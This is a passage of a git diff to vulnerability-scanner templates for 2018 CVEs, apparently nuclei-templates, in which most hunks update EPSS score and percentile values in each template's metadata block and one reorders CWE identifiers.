cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index e4ea0f69ee..9f7fd9aa7e 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.96434 - epss-percentile: 0.99458 + epss-score: 0.96345 + epss-percentile: 0.99445 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index f6488ad9ff..a9434a4a2c 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.00483 - epss-percentile: 0.7321 + epss-percentile: 0.73344 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index db0d4fb837..75bc492e73 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-14918 cwe-id: CWE-22 epss-score: 0.44897 - epss-percentile: 0.97046 + epss-percentile: 0.97063 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 4865e4f279..409aeaeb8d 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45579 + epss-percentile: 0.45685 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index b1d4888710..cec940d899 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - epss-score: 0.28185 - epss-percentile: 0.96376 + epss-score: 0.21114 + epss-percentile: 0.95976 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 1ea847bab5..5ffcb06902 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01414 - epss-percentile: 0.84969 + epss-percentile: 0.85063 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index fd7150c97c..eb5c8eee5f 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-15535 cwe-id: CWE-22 epss-score: 0.97149 - epss-percentile: 0.99753 + epss-percentile: 0.9976 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 1ed9482828..e533360cc3 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15745 cwe-id: CWE-22 epss-score: 0.94577 - epss-percentile: 0.99045 + epss-percentile: 0.99062 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 603be4043f..1db72f885d 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15917 cwe-id: CWE-79 epss-score: 0.05086 - epss-percentile: 0.92081 + epss-percentile: 0.92146 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index d9d28de69d..8c0da9c264 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15961 cwe-id: CWE-434 epss-score: 0.97447 - epss-percentile: 0.99944 + epss-percentile: 0.99947 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index 5e3aa4e6fb..da6f2bfdb4 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - epss-score: 0.3035 - epss-percentile: 0.96483 + epss-score: 0.31538 + epss-percentile: 0.96575 cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index d366cafeaf..8747d76854 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16133 cwe-id: CWE-22 epss-score: 0.05091 - epss-percentile: 0.92084 + epss-percentile: 0.92147 cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 377a36b891..dee4aa52f8 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index e18ef2c29e..29fbf3fb44 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16159 cwe-id: CWE-89 epss-score: 0.01247 - epss-percentile: 0.83931 + epss-percentile: 0.84031 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index dcd6ba14cc..b896206778 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 - epss-score: 0.19818 - epss-percentile: 0.95818 + epss-score: 0.21391 + epss-percentile: 0.95995 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 53116c52c7..b55d55fa8c 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - epss-score: 0.07867 - epss-percentile: 0.93555 + epss-score: 0.05805 + epss-percentile: 0.92627 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 6b101f82a3..a88fe1d43b 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.16221 - epss-percentile: 0.95459 + epss-percentile: 0.95476 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index bac78bcc29..e9ee717eda 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16299 cwe-id: CWE-22 epss-score: 0.02738 - epss-percentile: 0.89422 + epss-percentile: 0.89471 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index aa7b0f3ca9..5d7bf2039f 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00318 - epss-percentile: 0.67131 + epss-percentile: 0.67308 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 2ddc1df173..2b34bb4cde 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16670 cwe-id: CWE-287 epss-score: 0.00169 - epss-percentile: 0.53694 + epss-percentile: 0.53829 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index b845d9201d..21838499ef 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16671 cwe-id: CWE-200 epss-score: 0.00224 - epss-percentile: 0.60474 + epss-percentile: 0.60639 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 6692262be0..df07ab80d6 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - epss-score: 0.00544 - epss-percentile: 0.7478 + epss-score: 0.00543 + epss-percentile: 0.74889 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index eebbf279c4..15441d38b2 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28156 + epss-percentile: 0.28116 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index e7c29015ec..7d3ccc5c16 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16763 cwe-id: CWE-74 epss-score: 0.83439 - epss-percentile: 0.98139 + epss-percentile: 0.98171 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 479e4f0f35..ad0452c9b7 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.29944 - epss-percentile: 0.96464 + epss-percentile: 0.96496 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index dc302ff8a9..15515d9f76 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.00118 - epss-percentile: 0.45579 + epss-percentile: 0.45685 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 7cc7c7ea3b..88223b4a19 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-17153 cwe-id: CWE-287 epss-score: 0.92144 - epss-percentile: 0.98709 + epss-percentile: 0.98739 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 4c28afa9af..ed7791ae0a 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17246 - cwe-id: CWE-829,CWE-73 - epss-score: 0.96913 - epss-percentile: 0.99647 + cwe-id: CWE-73,CWE-829 + epss-score: 0.96827 + epss-percentile: 0.99619 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index e33c66d185..f4be0f31f9 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-17254 cwe-id: CWE-89 epss-score: 0.81793 - epss-percentile: 0.98075 + epss-percentile: 0.98093 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 98a34aba79..6b231c703d 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45579 + epss-percentile: 0.45685 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 567fa239f7..6ec866a6d2 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 - epss-score: 0.10458 - epss-percentile: 0.9443 + epss-score: 0.11315 + epss-percentile: 0.94677 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 010c50e864..96843e8334 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.00092 - epss-percentile: 0.38661 + epss-percentile: 0.38726 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 9b56e4b421..6cb802f69b 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.96515 - epss-percentile: 0.99488 + epss-score: 0.96258 + epss-percentile: 0.99415 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index c2c16ddf3f..b746ec522a 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-18323 cwe-id: CWE-22 epss-score: 0.97014 - epss-percentile: 0.99683 + epss-percentile: 0.9969 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 203743f286..7695035da5 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40264 + epss-percentile: 0.40317 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 19b5646518..e2c036aea6 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54754 + epss-percentile: 0.54918 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 278adf6bec..d60580e891 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18775 cwe-id: CWE-79 epss-score: 0.00157 - epss-percentile: 0.51947 + epss-percentile: 0.52016 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index a0dfdee854..d1b8c1214c 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18777 cwe-id: CWE-22 epss-score: 0.00224 - epss-percentile: 0.60506 + epss-percentile: 0.60675 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 819d12900a..64def1fb2f 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.95125 - epss-percentile: 0.99135 + epss-percentile: 0.9915 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 9ba7ae7486..2293e9393d 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18809 cwe-id: CWE-22 - epss-score: 0.46465 - epss-percentile: 0.97103 + epss-score: 0.42207 + epss-percentile: 0.96983 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index c58c977e81..c219db7980 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94158 + epss-percentile: 0.94194 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index d34619082b..ae987d2933 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19136 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51278 + epss-percentile: 0.51369 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index ffa618c0f6..2bff36c9de 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.0008 - epss-percentile: 0.33557 + epss-percentile: 0.335 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 7df56138dc..711581b43e 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 - epss-score: 0.36894 - epss-percentile: 0.96795 + epss-score: 0.37007 + epss-percentile: 0.96825 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index d188573b0f..924d50f043 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-19326 cwe-id: CWE-22 epss-score: 0.01158 - epss-percentile: 0.83216 + epss-percentile: 0.83304 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 4339c7164c..ab2f587362 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2018-19365 cwe-id: CWE-22 - epss-score: 0.02246 - epss-percentile: 0.88359 + epss-score: 0.01629 + epss-percentile: 0.86133 cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 48666a5555..8d3240ff37 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54754 + epss-percentile: 0.54918 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index d9054d6e9e..5cad18701c 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19439 cwe-id: CWE-79 - epss-score: 0.01097 - epss-percentile: 0.82731 + epss-score: 0.00776 + epss-percentile: 0.79369 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index d82dffc40e..5cb303ca47 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19458 cwe-id: CWE-287 epss-score: 0.09157 - epss-percentile: 0.94036 + epss-percentile: 0.94067 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 14719b1d6f..5b9984a11e 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19749 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.3973 + epss-percentile: 0.39797 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 5ed8834f31..283ac638a0 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19751 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.3973 + epss-percentile: 0.39797 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index b5226e33cc..7cc05c746e 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19752 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.3973 + epss-percentile: 0.39797 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 3e830716a2..eab00b5599 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19753 cwe-id: CWE-22 epss-score: 0.00942 - epss-percentile: 0.81293 + epss-percentile: 0.81358 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index d968d063f0..32aee1a628 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19877 cwe-id: CWE-79 epss-score: 0.00241 - epss-percentile: 0.61915 + epss-percentile: 0.62084 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 8a28d837a1..c454bfcce7 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19892 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41007 + epss-percentile: 0.41079 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 3eaccfcd7d..0d3ff7c13e 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19914 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51446 + epss-percentile: 0.51511 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index b0dbc9ab39..9c54f36027 100644 --- 